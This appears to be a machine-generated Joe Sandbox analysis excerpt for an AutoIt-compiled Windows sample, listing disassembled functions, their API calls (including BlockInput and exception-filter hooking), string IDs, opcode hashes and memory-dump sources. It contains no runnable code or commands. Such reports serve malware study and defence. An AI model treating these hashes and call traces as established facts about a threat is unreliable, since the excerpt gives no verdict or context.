• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
Strings
Similarity
• API ID:
• String ID:
• API String ID: 0-3916222277
APIs
• BlockInput.USER32(00000001), ref: 00B2EABD
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00AD03EE), ref: 00AD09DA
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
Strings
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 0-4108050209
                                                                                                                  • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                  • Instruction ID: 263d2c0ad9bdeaf1229c24e67fc10a5ed890e3232fd7c9547b6abc9979b4c195
                                                                                                                  • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                  • Instruction Fuzzy Hash: 4B51557260C7455BDB3C8768896EBBE73A99B02340F18050BD887D7392FA15EE81E356
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4e1ed224d9c73ec8d027e60f8307d5adcfd3fd5706500b29a81e582ced729234
                                                                                                                  • Instruction ID: f1581f80d345ef3572ed012cfb26798f318b2ffbffbf18f601700a30da9e8765
                                                                                                                  • Opcode Fuzzy Hash: 4e1ed224d9c73ec8d027e60f8307d5adcfd3fd5706500b29a81e582ced729234
                                                                                                                  • Instruction Fuzzy Hash: 9E323522D29F814DD7239635DC223396259AFB73C6F25D737E81AB69A5EF29C4C34100
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 218f90f85061d76d837fe81d4e533d7d3701c02d8b7f1901f5cdc74e1cf46c14
                                                                                                                  • Instruction ID: 3d99d18263d7db5a1c40ce56ab7facaac186dcd8e643d3b50f0767a5a6d71e2b
                                                                                                                  • Opcode Fuzzy Hash: 218f90f85061d76d837fe81d4e533d7d3701c02d8b7f1901f5cdc74e1cf46c14
                                                                                                                  • Instruction Fuzzy Hash: E232C032A041198BDF28CB29C4D4B7D7FE1EB45310F2986AAD89ADB2D5D730DD81EB41
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f47d8ee2df525fcb670e96338c43dae440e6558a38a168b6a784a942471ac561
                                                                                                                  • Instruction ID: 5838f57ad635cd70711d7305c5ffc1da8204c6c5d5c391ba72186ee690a0172f
                                                                                                                  • Opcode Fuzzy Hash: f47d8ee2df525fcb670e96338c43dae440e6558a38a168b6a784a942471ac561
                                                                                                                  • Instruction Fuzzy Hash: CD229F70E046099FDF14CFA8C981AEEB7F6FF44300F244629E916AB292EB759D51CB50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fa0279a9d2cbdf1811650cc3d101f4a8f859c76d1474f7eded9c22db395b9f20
                                                                                                                  • Instruction ID: 9d3f884bb3a6b60f2faca6eeca7c38864270ca3b66ad0a0eb8aa24000cf2dbfb
                                                                                                                  • Opcode Fuzzy Hash: fa0279a9d2cbdf1811650cc3d101f4a8f859c76d1474f7eded9c22db395b9f20
                                                                                                                  • Instruction Fuzzy Hash: 7D02C6B0E00209EFDB04DF54D981BAEB7B5FF44340F118169F9169B2A1EB31AE61CB91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b4c511e203860bfa2a09e57ef8d179867c16c3977b83d3a536011cf817783de0
                                                                                                                  • Instruction ID: a06a39064ff8aa8f567355b2c856257f8266b11396d1393051cb03b3febc8ecc
                                                                                                                  • Opcode Fuzzy Hash: b4c511e203860bfa2a09e57ef8d179867c16c3977b83d3a536011cf817783de0
                                                                                                                  • Instruction Fuzzy Hash: 1FB1F120D2AF414DD32396398831336B69CAFBB6D6F91D75BFC1675E22EF2286834140
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8e96fc5bf80ae0f804020db4446745e2f1b34aa2a8994faa465bbcee7210f535
                                                                                                                  • Instruction ID: d4f14368d2e1225ce4bfbb3913bafea77e3eb3066f73a3b9cc2cb4d2c11ea098
                                                                                                                  • Opcode Fuzzy Hash: 8e96fc5bf80ae0f804020db4446745e2f1b34aa2a8994faa465bbcee7210f535
                                                                                                                  • Instruction Fuzzy Hash: 4461367160870996DB3C9B288DA6BBE73A4EF41740F64091BE883DB3A1FA15DE428355
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 56e589815f369b21914beba8b6a1b4538df2859fcc408f75e0deb994701d4f60
                                                                                                                  • Instruction ID: 70054b5e0d9f8a952fec7f27f27a4fa430675ad54f41eed6efe42e69343921ee
                                                                                                                  • Opcode Fuzzy Hash: 56e589815f369b21914beba8b6a1b4538df2859fcc408f75e0deb994701d4f60
                                                                                                                  • Instruction Fuzzy Hash: 0761697160870957DE3C8B288956BBF73A6EF42704F10095BE9C3DB381FE16ED428A55
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2144200342.000000000180B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0180B000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_180b000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                  • Instruction ID: 8dc29bc3b942230fc956dfe28b3d6b1872994032341240beddec1f77157412d8
                                                                                                                  • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                  • Instruction Fuzzy Hash: 1C41D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d47050a65c8d34009a33602296303826b3e89d022a75f895a14aaa488f5d54bf
                                                                                                                  • Instruction ID: 4af10b42ee49ea4a2f04c7ede36539d5b74a6cd8fbe7d7c2113d5bff9bb56049
                                                                                                                  • Opcode Fuzzy Hash: d47050a65c8d34009a33602296303826b3e89d022a75f895a14aaa488f5d54bf
                                                                                                                  • Instruction Fuzzy Hash: DE21B7326206118BD728CF79C82367E73E5E754310F15866EE4A7C77D0DE39A904CB80
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2144200342.000000000180B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0180B000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_180b000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                  • Instruction ID: 4dd7b211cbf0fe41914a22582ad9cd1652de28e0ff4014aac57d04ac38e4c6cf
                                                                                                                  • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                  • Instruction Fuzzy Hash: 1A018078A01109EFCB95DF98C5909AEF7B5FB48310F208599E909A7341D731AE41DB80
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2144200342.000000000180B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0180B000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_180b000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                  • Instruction ID: bd403ae0538f1316b86a447b846426307e2225a40814a14d843e99e77fc1b3e0
                                                                                                                  • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                  • Instruction Fuzzy Hash: F0018078A0010DEFCB89DF98C5909AEF7B6FB48310F2085D9E819A7345D730AE41DB80
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2144200342.000000000180B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0180B000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_180b000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                  • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                  • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                  • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                  APIs
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00B32B30
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00B32B43
                                                                                                                  • DestroyWindow.USER32 ref: 00B32B52
                                                                                                                  • GetDesktopWindow.USER32 ref: 00B32B6D
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00B32B74
                                                                                                                  • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00B32CA3
                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00B32CB1
                                                                                                                  • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B32CF8
                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00B32D04
                                                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B32D40
                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B32D62
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B32D75
                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B32D80
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00B32D89
                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B32D98
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00B32DA1
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B32DA8
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00B32DB3
                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B32DC5
                                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B4FC38,00000000), ref: 00B32DDB
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00B32DEB
                                                                                                                  • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00B32E11
                                                                                                                  • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00B32E30
                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B32E52
                                                                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B3303F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                  • API String ID: 2211948467-2373415609
                                                                                                                  • Opcode ID: defe7c3ab841723835d0d8ea138ef3805339ef00b920fe31866f428ad1539a4c
                                                                                                                  • Instruction ID: 6fd404f091f1e23fdbbdd3467bd15820f7d9a1cb002938d85e21f728aadf825c
                                                                                                                  • Opcode Fuzzy Hash: defe7c3ab841723835d0d8ea138ef3805339ef00b920fe31866f428ad1539a4c
                                                                                                                  • Instruction Fuzzy Hash: 6E028C75901204AFDB14DFA4CD89EAE7BB9FF49710F108558F916AB2A1DB70AE01CB60
                                                                                                                  APIs
                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00B4712F
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00B47160
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00B4716C
                                                                                                                  • SetBkColor.GDI32(?,000000FF), ref: 00B47186
                                                                                                                  • SelectObject.GDI32(?,?), ref: 00B47195
                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00B471C0
                                                                                                                  • GetSysColor.USER32(00000010), ref: 00B471C8
                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00B471CF
                                                                                                                  • FrameRect.USER32(?,?,00000000), ref: 00B471DE
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00B471E5
                                                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00B47230
                                                                                                                  • FillRect.USER32(?,?,?), ref: 00B47262
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B47284
                                                                                                                    • Part of subcall function 00B473E8: GetSysColor.USER32(00000012), ref: 00B47421
                                                                                                                    • Part of subcall function 00B473E8: SetTextColor.GDI32(?,?), ref: 00B47425
                                                                                                                    • Part of subcall function 00B473E8: GetSysColorBrush.USER32(0000000F), ref: 00B4743B
                                                                                                                    • Part of subcall function 00B473E8: GetSysColor.USER32(0000000F), ref: 00B47446
                                                                                                                    • Part of subcall function 00B473E8: GetSysColor.USER32(00000011), ref: 00B47463
                                                                                                                    • Part of subcall function 00B473E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B47471
                                                                                                                    • Part of subcall function 00B473E8: SelectObject.GDI32(?,00000000), ref: 00B47482
                                                                                                                    • Part of subcall function 00B473E8: SetBkColor.GDI32(?,00000000), ref: 00B4748B
                                                                                                                    • Part of subcall function 00B473E8: SelectObject.GDI32(?,?), ref: 00B47498
                                                                                                                    • Part of subcall function 00B473E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00B474B7
                                                                                                                    • Part of subcall function 00B473E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B474CE
                                                                                                                    • Part of subcall function 00B473E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00B474DB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4124339563-0
                                                                                                                  • Opcode ID: 3092de19c8bab2596eab7b3cd21b818cbf5e9a3fc7d9551c2b7f2167ea4f662c
                                                                                                                  • Instruction ID: ac5adcdd073166674171f89bd6decaf6c5ae494b8fc07e6ae9f1e726fde39070
                                                                                                                  • Opcode Fuzzy Hash: 3092de19c8bab2596eab7b3cd21b818cbf5e9a3fc7d9551c2b7f2167ea4f662c
                                                                                                                  • Instruction Fuzzy Hash: 5CA1A176009301BFD7509F60DC48E6B7BE9FB4A720F100A19F962A71E1DB70EA44DB52
                                                                                                                  APIs
                                                                                                                  • DestroyWindow.USER32(00000000), ref: 00B3273E
                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00B3286A
                                                                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00B328A9
                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00B328B9
                                                                                                                  • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00B32900
                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00B3290C
                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00B32955
                                                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B32964
                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00B32974
                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00B32978
                                                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00B32988
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B32991
                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00B3299A
                                                                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B329C6
                                                                                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 00B329DD
                                                                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00B32A1D
                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B32A31
                                                                                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00B32A42
                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00B32A77
                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00B32A82
                                                                                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B32A8D
                                                                                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00B32A97
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                  • API String ID: 2910397461-517079104
                                                                                                                  • Opcode ID: be966d20ac4279d6b4e690df91ce2db448eb28f5f705ef285f29487e04a43dca
                                                                                                                  • Instruction ID: 1bab72f88fefa2ac75c14c14b3ed00bd56115dcbdced1e8f7c614f3baf68fc73
                                                                                                                  • Opcode Fuzzy Hash: be966d20ac4279d6b4e690df91ce2db448eb28f5f705ef285f29487e04a43dca
                                                                                                                  • Instruction Fuzzy Hash: 18B16C75A01215BFEB14DFA8CC4AEAE7BB9FB08710F108554F915E72A1DB70AD00CBA4
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00B24AED
                                                                                                                  • GetDriveTypeW.KERNEL32(?,00B4CB68,?,\\.\,00B4CC08), ref: 00B24BCA
